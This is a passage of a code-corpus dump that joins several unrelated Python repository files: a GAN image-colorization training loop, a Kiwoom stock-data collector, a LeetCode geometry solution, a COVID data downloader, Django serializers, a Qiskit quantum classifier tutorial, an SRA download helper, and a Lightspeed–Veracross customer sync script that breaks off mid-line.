cpkt['loss_G']\r\n loss_D = cpkt['loss_D']\r\n net_G.train()\r\n net_D.train()\r\n initial_epoch = epoch+1\r\nelse:\r\n net_G = net_G.apply(init_weights).train()\r\n net_D = net_D.apply(init_weights).train()\r\n initial_epoch = 0\r\nprint(initial_epoch)\r\n\r\n\r\ntrack_train_batch = next(iter(track_train))\r\ntrack_test_batch = next(iter(track_test))\r\n\r\nGANcriterion = DiscriminatorLoss(device)\r\ncriterion = nn.L1Loss()\r\nlambda1 = 100.\r\nwriter = SummaryWriter(log_dir=log_path)\r\n\r\nfor epoch in range(initial_epoch, 100):\r\n running_loss_D = 0.0\r\n running_loss_G = 0.0\r\n for i, data in tqdm(enumerate(generator)):\r\n L, ab = data[0]['L'].to(device), data[0]['ab'].to(device)\r\n fake_color = net_G(L).cuda()\r\n real_image = torch.cat([L, ab], dim=1).cuda()\r\n\r\n fake_image = fake_color.cuda()\r\n rgb = data[1].to(device)\r\n\r\n # train discriminator\r\n opt_D.zero_grad()\r\n # train on real images\r\n real_preds = net_D(real_image).cuda()\r\n loss_D_real = GANcriterion(real_preds, True).cuda()\r\n # train on fake images\r\n fake_preds = net_D(fake_image.detach()).cuda()\r\n loss_D_fake = GANcriterion(fake_preds, False).cuda()\r\n # total loss for D\r\n loss_D = ((loss_D_fake + loss_D_real) * 0.5).cuda()\r\n loss_D.backward()\r\n opt_D.step()\r\n\r\n # train generator\r\n opt_G.zero_grad()\r\n # train G using GAN criterion\r\n fake_preds = net_D(fake_image).cuda()\r\n loss_G_GAN = GANcriterion(fake_preds, True).cuda()\r\n\r\n # cycle GAN _ same training as for autoencoder times hyperparameter\r\n loss_G_L1 = (criterion(fake_color, rgb) * lambda1).cuda()\r\n # total loss for G\r\n loss_G = (loss_G_GAN + loss_G_L1).cuda()\r\n loss_G.backward()\r\n opt_G.step()\r\n\r\n running_loss_D += loss_D.item()\r\n running_loss_G += loss_G.item()\r\n\r\n running_loss_D = running_loss_D / (i + 1)\r\n running_loss_G = running_loss_G / (i + 1)\r\n writer.add_scalar('loss_D', running_loss_D, epoch)\r\n writer.add_scalar('loss_G', running_loss_G, epoch)\r\n\r\n # print statistics [epoch, number of steps, loss_G, loss_D]\r\n print('[%d, %5d] loss: %.3f %.3f' %\r\n (epoch, i + 1, running_loss_G, running_loss_D))\r\n\r\n checkpoint_path = os.path.join(checkpoint_dir, 'cp-{}.pth'.format(epoch))\r\n torch.save({'epoch': epoch,\r\n 'G_state_dict': net_G.state_dict(),\r\n 'D_state_dict': net_D.state_dict(),\r\n 'optimizerG_state_dict': opt_G.state_dict(),\r\n 'optimizerD_state_dict': opt_D.state_dict(),\r\n 'loss_G': loss_G,\r\n 'loss_D': loss_D\r\n }, checkpoint_path)\r\n\r\n color_train = net_G(track_train_batch[0]['L'].to(device)) * 255\r\n color_test = net_G(track_test_batch[0]['L'].to(device)) * 255\r\n\r\n color_train_grid = vutils.make_grid(color_train.to(device), padding=2, normalize=True, nrow=5).cpu()\r\n color_test_grid = vutils.make_grid(color_test.to(device), padding=2, normalize=True, nrow=5).cpu()\r\n\r\n writer.add_image('train_images', color_train_grid, epoch)\r\n writer.add_image('test_images', color_test_grid, epoch)\r\n\r\n train_path = os.path.join(img_train, 'img-{}.png'.format(epoch))\r\n test_path = os.path.join(img_test, 'img-{}.png'.format(epoch))\r\n save_image(color_train_grid, train_path)\r\n save_image(color_test_grid, test_path)\r\n\r\n plt.figure(figsize=(16, 16))\r\n plt.axis(\"off\")\r\n plt.title(\"Training Images\")\r\n plt.imshow(np.transpose(color_test_grid, (1, 2, 0)))\r\n\r\nwriter.close()\r\n","repo_name":"JiDarwish/combined_model_test","sub_path":"pix_main.py","file_name":"pix_main.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19231491946","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport sys\nimport threading\nfrom datetime import datetime, timedelta\nfrom logging.handlers import TimedRotatingFileHandler\nfrom time import sleep\n\nfrom PyQt5.QtWidgets import QApplication\n\nimport config\nimport database\nfrom core import ScreenNumberManager\nfrom database import Base, StockBasicInfo, StockDayCandleChart, Session, DATABASE\nfrom trader import KWTrader\n\nCOMMON_DELAY = 2.0\nLONG_DELAY = 20.0\n\nIS_TEST_MODE = True\n\nif IS_TEST_MODE:\n # STOCK_ACCOUNT_NUMBER = \"8888888811\"\n STOCK_ACCOUNT_NUMBER = config.TEST_STOCK_ACCOUNT_NUMBER # 계좌정보가 8자리이면 끝에 11 을 붙여 10자리로 만든다.\n LOG_LEVEL = logging.DEBUG\n LOG_LEVEL = logging.INFO\nelse:\n # STOCK_ACCOUNT_NUMBER = \"1234567890\"\n STOCK_ACCOUNT_NUMBER = config.REAL_STOCK_ACCOUNT_NUMBER\n LOG_LEVEL = logging.DEBUG\n\n# Timestamp for loggers\nformatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\n\n# 로그 파일 핸들러\nfh_log = TimedRotatingFileHandler('logs/log', when='midnight', encoding='utf-8', backupCount=120)\nfh_log.setFormatter(formatter)\n\n# stdout handler\nstdout_handler = logging.StreamHandler(sys.stdout)\nstdout_handler.setFormatter(formatter)\n\n# 로거 생성 및 핸들러 등록\nlogger = logging.getLogger(__name__)\nlogger.setLevel(LOG_LEVEL)\nlogger.addHandler(fh_log)\nlogger.addHandler(stdout_handler)\n\n\ndef run_thread():\n while True:\n # 로그인 체크\n connect_state = trader.get_connect_state()\n if connect_state is not None:\n if connect_state == 1:\n # login ok\n break\n sleep(COMMON_DELAY)\n\n logger.info('========================== 5초 딜레이 ==========================')\n sleep(5.0)\n\n request_trade_balloon = False\n while True:\n # 거래량급증\n if len(trader.stock_list) > 0:\n break\n else:\n if not request_trade_balloon:\n request_trade_balloon = True\n trader.logger.info('거래량급증요청')\n screen_number = ScreenNumberManager.instance().get_screen_number()\n trader.logger.info(\"screen_number : %s\" % screen_number)\n\n # 시장구분 = 000:전체, 001:코스피, 101:코스닥\n # 정렬구분 = 1:급증량, 2:급증률\n # 시간구분 = 1:분, 2:전일\n # 거래량구분 = 5:5천주이상, 10:만주이상, 50:5만주이상, 100:10만주이상, 200:20만주이상, 300:30만주이상, 500:50만주이상, 1000:백만주이상\n # 시간 = 분 입력\n # 종목조건 = 0:전체조회, 1:관리종목제외, 5:증100제외, 6:증100만보기, 7:증40만보기, 8:증30만보기, 9:증20만보기\n # 가격구분 = 0:전체조회, 2:5만원이상, 5:1만원이상, 6:5천원이상, 8:1천원이상, 9:10만원이상\n # market_type, sort_type, time_type, trade_type, minutes, jongmok_type, price_type, prev_next, screen_no\n trader.request_trade_balloon('000', '1', '1', '5', '1', '5', '0', 0, screen_number)\n sleep(COMMON_DELAY)\n\n logger.info('========================== 5초 딜레이 ==========================')\n sleep(5.0)\n\n while True:\n for stock_code in trader.stock_list:\n print('111')\n # 주식기본정보\n # while database.DB_LOCKED:\n # sleep(0.1)\n # database.DB_LOCKED = True\n database.db_lock.acquire()\n print('database.db_lock.acquire() 33')\n session = Session()\n item = session.query(StockBasicInfo).filter(StockBasicInfo.종목코드 == stock_code).first()\n if item is not None:\n delta = (datetime.now() - item.lastupdate)\n if delta.days == 0:\n # 업데이트 불필요\n print('skip 종목명(종목코드) : %s(%s)' % (trader.get_master_code_name(stock_code), stock_code))\n Session.remove()\n # database.DB_LOCKED = False\n database.db_lock.release()\n print('222')\n print('database.db_lock.release() 33')\n continue\n trader.logger.info('기본정보 종목명(종목코드) : %s(%s)' % (trader.get_master_code_name(stock_code), stock_code))\n screen_number = ScreenNumberManager.instance().get_screen_number()\n trader.logger.info(\"screen_number : %s\" % screen_number)\n Session.remove()\n # database.DB_LOCKED = False\n database.db_lock.release()\n print('database.db_lock.release() 33')\n trader.request_stock_basic_info(stock_code, 0, screen_number)\n print('333')\n sleep(COMMON_DELAY)\n\n yesterday = datetime.now() - timedelta(days=1)\n yesterday = yesterday.strftime(\"%Y%m%d\")\n today = datetime.now()\n today = today.strftime(\"%Y%m%d\")\n for stock_code in trader.stock_list:\n # 주식일봉차트\n # while database.DB_LOCKED:\n # sleep(0.1)\n # database.DB_LOCKED = True\n database.db_lock.acquire()\n print('database.db_lock.acquire() 44')\n session = Session()\n item = session.query(StockDayCandleChart)\\\n .filter(StockDayCandleChart.종목코드 == stock_code)\\\n .order_by(StockDayCandleChart.일자.desc()).first()\n if item is not None:\n lastupdate = item.lastupdate.strftime(\"%Y%m%d\")\n if today == lastupdate:\n # 업데이트 불필요\n print('skip 종목명(종목코드) : %s(%s)' % (trader.get_master_code_name(stock_code), stock_code))\n Session.remove()\n # database.DB_LOCKED = False\n database.db_lock.release()\n print('database.db_lock.release() 44')\n continue\n Session.remove()\n # database.DB_LOCKED = False\n database.db_lock.release()\n print('database.db_lock.release() 44')\n\n trader.logger.info('일봉 종목명(종목코드) : %s(%s)' % (trader.get_master_code_name(stock_code), stock_code))\n screen_number = ScreenNumberManager.instance().get_screen_number()\n trader.logger.info(\"screen_number : %s\" % screen_number)\n trader.request_day_candle_chart(stock_code, yesterday, 1, 0, screen_number)\n\n sleep(COMMON_DELAY)\n\n break\n\n print('finished.')\n\n\nif __name__ == '__main__':\n Base.metadata.create_all(DATABASE)\n\n app = QApplication(sys.argv)\n\n trader = KWTrader()\n trader.initialize(logger)\n\n trader.login()\n\n trader.setup()\n\n x = threading.Thread(target=run_thread, args=())\n x.start()\n\n # # 종목명\n # print(trader.get_master_code_name('300120'))\n\n # 계좌수익률요청\n # trader.request_account_profit(STOCK_ACCOUNT_NUMBER, 0, SCREEN_NUMBER)\n\n # 주식기본정보\n # trader.request_stock_basic_info(\"035720\", 0, SCREEN_NUMBER)\n\n # 종목별투자자기관별요청\n # trader.request_buy_gigwan('20210218', \"035720\", 1, 0, 1000, 0, SCREEN_NUMBER)\n\n # 분봉\n # trader.request_minute_candle_chart('300120', 3, 1, 0, SCREEN_NUMBER)\n # 일봉\n # trader.request_day_candle_chart('300120', \"20200101\", 1, 0, SCREEN_NUMBER)\n # 주봉\n # trader.request_week_candle_chart('300120', \"20200101\", \"20210218\", 1, 0, SCREEN_NUMBER)\n\n # 업종일봉조회요청\n # trader.request_upjong_day_candle_chart('001', \"20200101\", 0, SCREEN_NUMBER)\n\n # trader.request_call_price('300120', 2, SCREEN_NUMBER)\n #\n # trader.disconnect_real_data(SCREEN_NUMBER)\n\n # trader.send_order(\"주문\", SCREEN_NUMBER, STOCK_ACCOUNT_NUMBER, 1, \"034830\", 1, 2100, \"00\", \"\")\n # trader.send_order(\"주문\", SCREEN_NUMBER, STOCK_ACCOUNT_NUMBER, 2, \"034830\", 4, 2100, \"00\", \"\")\n\n sys.exit(app.exec_())\n","repo_name":"skyer9/KiwoomSysTrade","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":8082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7090069168","text":"class Solution:\n def distance(self, pt1, pt2):\n return ((pt2[0] - pt1[0]) ** 2 + (pt2[1] - pt1[1]) ** 2) ** 0.5\n def countPoints(self, points: List[List[int]], queries: List[List[int]]) -> List[int]:\n answer = [0] * len(queries)\n \n for i, query in enumerate(queries):\n *center, radius = query\n\n for pt in points:\n if self.distance(center, pt) <= radius:\n answer[i] += 1\n \n return answer\n \n \n ","repo_name":"ffekirnew/a2sv-competitive-programming","sub_path":"1828-queries-on-number-of-points-inside-a-circle/1828-queries-on-number-of-points-inside-a-circle.py","file_name":"1828-queries-on-number-of-points-inside-a-circle.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22812218201","text":"#! /usr/bin/env python3\n\nimport requests\nimport os\n\ndef get_data(datafold=\"../dat\"):\n\n url_owid = \"https://covid.ourworldindata.org/data/owid-covid-data.csv\"\n url_cdc_vacc_us = \"https://data.cdc.gov/api/views/unsk-b7fc/rows.csv?accessType=DOWNLOAD\"\n url_johns_hopkins_us_cases = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\"\n url_johns_hopkins_us_deaths = \"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\"\n\n urls = [url_owid,url_cdc_vacc_us,url_johns_hopkins_us_cases,url_johns_hopkins_us_deaths]\n\n files = [\"owid\",\"us_states_vaccines\",\"us_states_cases\",\"us_states_deaths\"]\n\n for k, url in enumerate(urls):\n try:\n r = requests.get(url)\n with open(os.path.join(datafold,f'{files[k]}.csv'),\"wb\") as f:\n f.write(r.content)\n except requests.exceptions.RequestException as e:\n raise SystemExit(e)\n\nif __name__ == \"__main__\":\n get_data()\n\n\n\n","repo_name":"FabianSchubert/CoronaWebsite","sub_path":"data_processing/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8214693787","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\n\nfrom apps.tube2drive.models import UploadRequest\n\nUser = get_user_model()\n\n\nclass UploadRequestSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for read and create requests.\"\"\"\n\n class Meta:\n model = UploadRequest\n fields = \"__all__\"\n read_only_fields = (\n \"id\",\n \"status\",\n \"user\",\n \"unique_identifier\",\n \"slug\",\n )\n\n def save(self, **kwargs) -> UploadRequest:\n \"\"\"Save current logged user for user field.\n\n Returns\n -------\n UploadRequest\n \"\"\"\n request = self.context.get(\"request\")\n user = request.user if hasattr(request, \"user\") else None # type: ignore[union-attr]\n return super().save(user=user)\n\n\nclass UploadRequestUpdateStatusSerializer(serializers.ModelSerializer):\n \"\"\"Serializer to update request status.\"\"\"\n\n class Meta:\n model = UploadRequest\n fields = (\"status\",)\n","repo_name":"summerthe/summers_api","sub_path":"apps/tube2drive/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43508736474","text":"from qiskit.ml.datasets import *\nfrom qiskit import QuantumCircuit\nfrom qiskit.aqua.components.optimizers import COBYLA\nfrom qiskit.circuit.library import ZZFeatureMap, RealAmplitudes\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom qiskit.quantum_info import Statevector\n\n#%matplotlib inline\n\n###\n### 1 Variational quantum classifier \n###\n\n# size of training data set\ntraining_size = 100\n# size of test data set\ntest_size = 20\n# dimension of data sets\nn = 2\n# construct training and test data\n\n_, training_input, test_input, class_labels = ad_hoc_data(training_size=training_size, test_size=test_size, n=n, gap=0.3, plot_data=False)\n#print(class_labels)\n\nsv = Statevector.from_label('0' * n)\nfeature_map = ZZFeatureMap(n, reps=1)\nvar_form = RealAmplitudes(n, reps=1)\ncircuit = feature_map.combine(var_form)\n#circuit.draw(output=\"mpl\")\n#print(circuit)\n\n\ndef get_data_dict(params, x):\n parameters = {}\n for i, p in enumerate(feature_map.ordered_parameters):\n parameters[p] = x[i]\n for i, p in enumerate(var_form.ordered_parameters):\n parameters[p] = params[i]\n return parameters\n\ndata = [0.1, 1.2]\nparams = np.array([0.1, 1.2, 0.02, 0.1])\ncirc_ = circuit.assign_parameters(get_data_dict(params, data))\n#circ_.draw(plot_barriers=True)\n#print(circ_)\n\n\ndef assign_label(bit_string, class_labels):\n hamming_weight = sum([int(k) for k in list(bit_string)])\n is_odd_parity = hamming_weight & 1\n if is_odd_parity:\n return class_labels[1]\n else:\n return class_labels[0]\n\ndef return_probabilities(counts, class_labels):\n shots = sum(counts.values())\n result = {class_labels[0]: 0, class_labels[1]: 0}\n for key, item in counts.items():\n label = assign_label(key, class_labels)\n result[label] += counts[key]/shots\n return result\n\n#print (return_probabilities({'00' : 10, '01': 10, '11': 20}, class_labels))\n\ndef classify(x_list, params, class_labels):\n qc_list = []\n for x in x_list:\n circ_ = circuit.assign_parameters(get_data_dict(params, x))\n qc = sv.evolve(circ_)\n qc_list += [qc]\n probs = []\n for qc in qc_list:\n counts = qc.to_counts()\n prob = return_probabilities(counts, class_labels)\n probs += [prob]\n return probs\n\n# classify a test data point\nx = np.asarray([[0.5, 0.9]])\n#print(classify(x, params=np.array([0.8, -0.5, 1.5, 0,5]), class_labels=class_labels))\n\ndef cost_estimate_sigmoid(probs, expected_label): # probability of labels vs actual labels\n p = probs.get(expected_label)\n sig = None\n if np.isclose(p, 0.0):\n sig = 1\n elif np.isclose(p, 1.0):\n sig = 0\n else:\n denominator = np.sqrt(2*p*(1-p))\n x = np.sqrt(200)*(0.5-p)/denominator\n sig = 1/(1+np.exp(-x))\n return sig\n\n'''\nx = np.linspace(0, 1, 20)\ny = [cost_estimate_sigmoid({'A': x_, 'B': 1-x_}, 'A') for x_ in x]\nplt.plot(x, y)\nplt.xlabel('Probability of assigning the correct class')\nplt.ylabel('Cost value')\nplt.show()\n'''\n\ndef cost_function(training_input, class_labels, params, shots=100, print_value=False):\n # map training input to list of labels and list of samples\n cost = 0\n training_labels = []\n training_samples = []\n for label, samples in training_input.items():\n for sample in samples:\n training_labels += [label]\n training_samples += [sample]\n # classify all samples\n probs = classify(training_samples, params, class_labels)\n \n # evaluate costs for all classified samples\n for i, prob in enumerate(probs):\n cost += cost_estimate_sigmoid(prob, training_labels[i])\n cost /= len(training_samples)\n \n # print resulting objective function\n if print_value:\n print('%.4f' % cost)\n \n # return objective value\n return cost\n\n#print(cost_function(training_input, class_labels, params))\n\n####\n#### 1.1 Train the classifier\n####\n\n# setup the optimizer\noptimizer = COBYLA(maxiter=100)\n# define objective function for training\nobjective_function = lambda params: cost_function(training_input, class_labels, params, print_value=True)\n# randomly initialize the parameters\nnp.random.seed(137)\ninit_params = 2*np.pi*np.random.rand(n*(1)*2)\n# train classifier\nopt_params, value, _ = optimizer.optimize(len(init_params), objective_function, initial_point=init_params)\n# print results\n#print()\n#print('opt_params:', opt_params)\n#print('opt_value: ', value)\n\n\n####\n#### 1.2 Train the classifier\n####\n\n# collect coordinates of test data\ntest_label_0_x = [x[0] for x in test_input[class_labels[0]]]\ntest_label_0_y = [x[1] for x in test_input[class_labels[0]]]\ntest_label_1_x = [x[0] for x in test_input[class_labels[1]]]\ntest_label_1_y = [x[1] for x in test_input[class_labels[1]]]\n# initialize lists for misclassified datapoints\ntest_label_misclassified_x = []\ntest_label_misclassified_y = []\n\n# evaluate test data\nfor label, samples in test_input.items():\n # classify samples\n results = classify(samples, opt_params, class_labels)\n # analyze results\n for i, result in enumerate(results):\n # assign label\n assigned_label = class_labels[np.argmax([p for p in result.values()])]\n print('----------------------------------------------------')\n print('Data point: ', samples[i])\n print('Label: ', label)\n print('Assigned: ', assigned_label)\n print('Probabilities: ', result)\n if label != assigned_label:\n print('Classification:', 'INCORRECT')\n test_label_misclassified_x += [samples[i][0]]\n test_label_misclassified_y += [samples[i][1]]\n else:\n print('Classification:', 'CORRECT')\n# compute fraction of misclassified samples\ntotal = len(test_label_0_x) + len(test_label_1_x)\nnum_misclassified = len(test_label_misclassified_x)\nprint()\nprint(100*(1-num_misclassified/total), \"% of the test data was correctly classified!\")\n# plot results\nplt.figure()\nplt.scatter(test_label_0_x, test_label_0_y, c='b', label=class_labels[0], linewidths=5)\nplt.scatter(test_label_1_x, test_label_1_y, c='g', label=class_labels[1], linewidths=5)\nplt.scatter(test_label_misclassified_x, test_label_misclassified_y, linewidths=20, s=1, facecolors='none',\nedgecolors='r')\nplt.legend()\nplt.show()\n","repo_name":"padraignix/quantum-challenges","sub_path":"qhack2021/preparation/1-qml-minischool/minilecture-video3.py","file_name":"minilecture-video3.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"22690802183","text":"import argparse\nfrom pathlib import Path\nimport subprocess\nimport os\nimport sys\nimport requests\n\ndef getSraFastqToolkits(info: dict, run_acc: str, args: argparse.Namespace):\n OUTDIR = args.outdir\n HTTP_PROXY = args.http_proxy\n\n sys.stderr.write(f\"Retrieving FASTQ for {run_acc} with NCBI SRA Toolkit...\\n\")\n platform = info[\"platform\"]\n url = info[\"url\"]\n filename = f\"{run_acc}.fastq\"\n\n sys.stderr.write(f\"Downloading {url}...\\n\")\n out_path = Path(OUTDIR, \"sra2fastq_temp\", filename)\n headers = {\"User-Agent\": \"Mozilla/5.0\"}\n\n if HTTP_PROXY is not None:\n proxies = {\"http\": HTTP_PROXY, \"https\": HTTP_PROXY}\n else:\n proxies = None\n\n try:\n response = requests.get(url, headers=headers, stream=True, proxies=proxies)\n response.raise_for_status()\n\n with open(out_path, \"wb\") as file:\n for chunk in response.iter_content(chunk_size=8192):\n file.write(chunk)\n\n except requests.exceptions.RequestException as e:\n sys.stderr.write(f\"Failed to download SRA file from {url}. Error: {str(e)} \\n\")\n return \"failed\"\n\n sys.stderr.write(\"Done.\")\n\n # check downloaded file\n filesize = out_path.getsize()\n if not filesize:\n sys.stderr.write(f\"Failed to download SRA file from {url}.\\n\")\n return \"failed\"\n\n # dump fastq from SRA file\n options = []\n if \"illu\" in platform.lower():\n options.append(\"--split-files\")\n elif \"solid\" in platform.lower():\n options.extend([\"--split-files\", \"-B\"])\n sys.stderr.write(f\"Running fastq-dump with options {' '.join(options)}...\\n\")\n\n try:\n subprocess.run(\n [\"fastq-dump\", *options, \"--outdir\", Path(OUTDIR, \"sra2fastq_temp\"), out_path],\n check=True,\n )\n except subprocess.CalledProcessError:\n sys.stderr.write(f\"Failed to run fastq-dump from {out_path}.\\n\")\n return \"failed\"\n\n sys.stderr.write(\"Done using fastq-dump\\n\")\n\n return \"success\"\n","repo_name":"LANL-Bioinformatics/EDGE_workflows","sub_path":"sra2fastq/sra2fastq_subroutines/getSraFastqToolkits.py","file_name":"getSraFastqToolkits.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74116954726","text":"import veracross_api\nimport lightspeed_api\nimport sys\nimport getopt\nimport os\nimport datetime\nimport pandas\nimport csv\nfrom decimal import Decimal, ROUND_HALF_UP\nimport logging\nimport json\nimport pytz\nimport datetime\n\n__version__ = \"0.2\"\n\n# Creating logger\napplogs = logging.getLogger(__name__)\napplogs.setLevel(logging.DEBUG)\n\n# Stream Log\nstream = logging.StreamHandler()\nstreamformat = logging.Formatter(\"%(levelname)s:%(module)s:%(message)s\")\nstream.setLevel(logging.DEBUG)\nstream.setFormatter(streamformat)\n\n# Adding all handlers to the logging\napplogs.addHandler(stream)\n\n\ndef print_help():\n print(\n \"\"\"\n main.py:\n --version = Script version\n --help = This text\n --operation = \"sync\" to performa sync with LS. \"export\" to export data from LS. \n --config = Complete path to config file from LSVCConnector (see sample_config.json)\n --operation_json = Optional JSON file with sync parameters.\n Mix of JSON and other switches allowed.\n Other switches override JSON.\n --type = VC role to sync (\"Students\" or \"Faculty Staff\")\n --sync_force = Force update all VC records in LS.\n --sync_delete = Search all LS records and delete all not found in VC.\n --filter_after_date = Only update records updated in VC after date formatted as YYYY-MM-DD\n --filter_grade_level = Comma seperated list of grades by VC ID to sync (\"1,2,3,4,20\")\n --log_path = Complete file pathf to where the logfile should be.\n \n /usr/local/bin/python3 main.py --operation=sync --config=config.json --operation_json=/path/to/operation_json.json\n \"\"\"\n )\n\n\ndef load_json(file):\n f = open(file)\n r = json.load(f)\n return r\n\n\ndef get_ls_customer_types(lightspeed_connection):\n ls_customer_types = dict()\n\n try:\n ct = lightspeed_connection.get(\"CustomerType\")\n for i in ct['CustomerType']:\n ls_customer_types[i[\"name\"]] = i[\"customerTypeID\"]\n except:\n applogs.info(\"Cannot get customer types from Lightspeed API, or none exist.\")\n sys.exit(2)\n\n return ls_customer_types\n\n\ndef get_custom_field_id(lightspeed_connection, name):\n \"\"\"\n Get the Lightspeed id for the customfields\n :return:\n \"\"\"\n try:\n custom_fields = lightspeed_connection.get(\"Customer/CustomField\")\n if isinstance(custom_fields[\"CustomField\"], list):\n for cf in custom_fields[\"CustomField\"]:\n # Find internal id for named field\n if str(cf[\"name\"]) == str(name):\n return cf[\"customFieldID\"]\n else:\n return None\n except:\n return None\n\n\ndef delete_customer(config):\n \"\"\"\n Delete records in Lightspeed. Filters customers to those that have a companyRegistrationNumber\n :return:\n \"\"\"\n c = config\n ls = lightspeed_api.Lightspeed(c)\n vc = veracross_api.Veracross(c)\n\n valid_vc_ids = []\n for i in vc.pull(\"facstaff\", parameters=dict(roles='1,2')):\n valid_vc_ids.append(i[\"person_pk\"])\n for i in vc.pull(\"students\", parameters=dict(option=\"2\")):\n valid_vc_ids.append(i[\"person_pk\"])\n\n current_customers = ls.get(\"Customer\", dict(load_relations=\"all\"))\n\n for i in current_customers[\"Customer\"]:\n if i[\"companyRegistrationNumber\"] != '':\n if int(i[\"companyRegistrationNumber\"]) not in valid_vc_ids:\n if float(i[\"CreditAccount\"][\"balance\"]) <= 0:\n applogs.info(\"Deleting customer {} {}\".format(i[\"firstName\"], i[\"lastName\"]))\n ls.delete(\"Customer/\" + i[\"customerID\"])\n else:\n applogs.info(\"Cannot delete customer {}, {} {} with credit balance.\".format(i[\"customerID\"],\n i[\"firstName\"],\n i[\"lastName\"]))\n\n\ndef sync_ls_vc(config, operation_json):\n\n c = config\n ls = lightspeed_api.Lightspeed(c)\n vc = veracross_api.Veracross(c)\n\n # Make sure we have a lastsync and veracross id field mapped.\n if c[\"import_options_veracrossid\"] is None or c[\"import_options_lastsync\"] is None:\n applogs.info(\"Missing import_options_veracrossid or import_options_lastsync in config file.\")\n sys.exit(2)\n\n # Placeholder for parameters\n param = {}\n\n # Determine if we are syncing VC changes after particular date and update params set to VC.\n if \"after_date\" in operation_json[\"sync_filters\"]:\n if operation_json[\"sync_filters\"][\"after_date\"]:\n param.update({\"updated_after\": str(operation_json[\"sync_filters\"][\"after_date\"])})\n\n # If we are working with students, add additional parameters.\n if \"type\" in operation_json:\n if operation_json[\"type\"] == \"Students\":\n applogs.info(\"Getting Veracross Students (Current)\")\n\n # Add a grade level filter\n if \"grade_level\" in operation_json[\"sync_filters\"]:\n if isinstance(operation_json[\"sync_filters\"][\"grade_level\"], list):\n grade_list_string = \",\".join(str(item) for item in operation_json[\"sync_filters\"][\"grade_level\"])\n param.update({\"grade_level\": str(grade_list_string)})\n\n # Limit to only current students\n param.update({\"option\": \"2\"})\n\n # Show our parameters to console\n applogs.info(\"VC Parameters: \" + str(param))\n\n # Get Veracross data for students\n vcdata = vc.pull(\"students\", parameters=param)\n\n # Get Lightspeed id number that matches customer_type Student\n try:\n ls_customer_types = get_ls_customer_types(ls)\n ls_customerTypeID = ls_customer_types[\"Student\"]\n except:\n applogs.info(\"Unable to assign customer type from Lightspeed\")\n sys.exit(2)\n\n # Determine if we want FacultyStaff from VC\n if operation_json[\"type\"] == \"Faculty Staff\":\n\n applogs.info(\"Getting Veracross Faculty Staff (Faculty and Staff)\")\n # Limit to roles 1 & 2 in VC Api.\n param.update({\"roles\": \"1,2\"})\n\n # Show parameters log\n applogs.info(\"VC Parameters: \" + str(param))\n\n # Get Veracross data for Faculty Staff\n vcdata = vc.pull(\"facstaff\", parameters=param)\n\n # Determine what Lightspeed customer id number for FacStaff\n try:\n ls_customer_types = get_ls_customer_types(ls)\n ls_customerTypeID = ls_customer_types[\"FacultyStaff\"]\n except:\n applogs.info(\"Unable to assign customer type from Lightspeed\")\n sys.exit(2)\n\n # User did not select a user type\n else:\n applogs.info(\"type of 'Faculty Staff' or 'Students' not found in sync options json file.\")\n sys.exit(2)\n\n if vcdata:\n # Get field IDs\n vc_custom_id = get_custom_field_id(ls, str(c[\"import_options_veracrossid\"]))\n lastsync_custom_id = get_custom_field_id(ls, str(c[\"import_options_lastsync\"]))\n\n # Loop through the data from VC.\n for i in vcdata:\n\n applogs.info(\"Processing VC Record {}\".format(i[\"person_pk\"]))\n\n # Get household data for this person\n hh = vc.pull(\"households/\" + str(i[\"household_fk\"]))\n h = hh[\"household\"]\n\n # Set search parameters for lightspeed and see if we find someone in LS.\n lsparam = dict(load_relations='all', limit=1, companyRegistrationNumber=str(i[\"person_pk\"]))\n check_current = ls.get(\"Customer\", parameters=lsparam)\n\n # Format data to how it should look. First name will format later.\n vc_formatted = {'Customer':\n {'firstName': '',\n 'lastName': i[\"last_name\"],\n 'companyRegistrationNumber': i[\"person_pk\"],\n 'customerTypeID': ls_customerTypeID,\n 'Contact': {\n 'custom': i[\"person_pk\"],\n 'noEmail': 'false',\n 'noPhone': 'false',\n 'noMail': 'false',\n 'Emails': {\n 'ContactEmail': {\n 'address': i[\"email_1\"],\n 'useType': 'Primary'\n }\n },\n 'Addresses': {\n 'ContactAddress': {\n 'address1': h[\"address_1\"],\n 'address2': h[\"address_2\"],\n 'city': h[\"city\"],\n 'state': h[\"state_province\"],\n 'zip': h[\"postal_code\"],\n 'country': h[\"country\"],\n 'countryCode': '',\n 'stateCode': ''\n }\n }\n },\n 'CreditAccount': {\n 'creditLimit': str(c[\"import_options_creditamount\"]) + '.00'\n },\n 'CustomFieldValues': {\n 'CustomFieldValue': [{\n 'customFieldID': vc_custom_id,\n 'value': str(i[\"person_pk\"])\n }, {\n 'customFieldID': lastsync_custom_id,\n 'value': str(datetime.datetime.now())\n }\n ]}\n }\n }\n\n # Update data to use correct nick name format from VC.\n # Added because of bug in VC API where sometimes one is returned over other.\n if 'nick_first_name' in i:\n vc_formatted['Customer']['firstName'] = 